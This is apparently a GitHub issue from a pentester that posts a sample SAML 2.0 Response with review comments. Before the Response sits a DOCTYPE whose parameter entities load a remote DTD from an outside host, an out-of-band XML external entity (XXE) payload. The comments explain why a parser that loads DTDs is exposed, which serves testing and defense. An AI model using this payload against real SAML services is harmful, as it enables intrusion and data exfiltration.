Open abrahack opened 3 years ago
Hello,
Please, I came across this awesome project of yours while pentesting, and I have some questions.
<?xml version="1.0"?>
<!--
  NOTE(review): sample SAML 2.0 Response preceded by a DOCTYPE.
  The internal subset declares the parameter entity "remote" with an http
  SYSTEM identifier and references it; "send" is referenced but is not
  declared anywhere in this document. The DOCTYPE names the root "data",
  while the document element is samlp:Response.
  A parser that loads DTDs or resolves external entities would try to fetch
  that URL while parsing, which happens before any signature can be checked.
  A service provider should refuse SAML input that carries a DOCTYPE, or parse
  it with DTD loading, external entity resolution and network access disabled.
-->
<!DOCTYPE data [
  <!ENTITY % remote SYSTEM "http://ping.local.com/foo">
  %remote;
  %send;
]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                Destination="http://localhost:9000/saml/acs/"
                ID="_b4e5466d30d343a39b281c89699558dd"
                InResponseTo="_d155a38534a04be181c9b8a9aae1b5e8"
                IssueInstant="2021-05-09T21:54:51.309039+00:00"
                Version="2.0">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://localhost:8000/saml/metadata.xml</saml:Issuer>
  <!-- Signature content is elided ("...") in the sample, so it cannot be verified as shown. -->
  <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> ... </ds:Signature>
  <samlp:Status>
    <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
  </samlp:Status>
  <saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
                  ID="_79630753cb3f44158e5cae1849045bf3"
                  IssueInstant="2021-05-09T21:54:51.309039+00:00"
                  Version="2.0">
    <saml:Issuer>http://localhost:8000/saml/metadata.xml</saml:Issuer>
    <!-- Assertion signature is elided in the same way as the one on the Response. -->
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> ... </ds:Signature>
    <saml:Subject>
      <saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email"
                   SPNameQualifier="http://localhost:9000/saml/metadata.xml">example@example.com</saml:NameID>
      <!-- Bearer confirmation: InResponseTo and Recipient repeat the values on the Response element. -->
      <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
        <saml:SubjectConfirmationData InResponseTo="_d155a38534a04be181c9b8a9aae1b5e8"
                                      NotOnOrAfter="2021-05-09T22:09:51.309039+00:00"
                                      Recipient="http://localhost:9000/saml/acs/"/>
      </saml:SubjectConfirmation>
    </saml:Subject>
    <!-- Validity window and audience the receiving service provider is expected to check. -->
    <saml:Conditions NotBefore="2021-05-09T21:51:51.309039+00:00"
                     NotOnOrAfter="2021-05-09T22:09:51.309039+00:00">
      <saml:AudienceRestriction>
        <saml:Audience>http://localhost:9000/saml/metadata.xml</saml:Audience>
      </saml:AudienceRestriction>
    </saml:Conditions>
    <saml:AuthnStatement AuthnInstant="2021-05-09T21:54:51.309039+00:00">
      <saml:AuthnContext>
        <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
      </saml:AuthnContext>
    </saml:AuthnStatement>
    <saml:AttributeStatement>
      <saml:Attribute Name="foo"
                      NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
        <saml:AttributeValue>bar</saml:AttributeValue>
      </saml:Attribute>
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>
Thanks in advance for your help. Regards, @abrahack.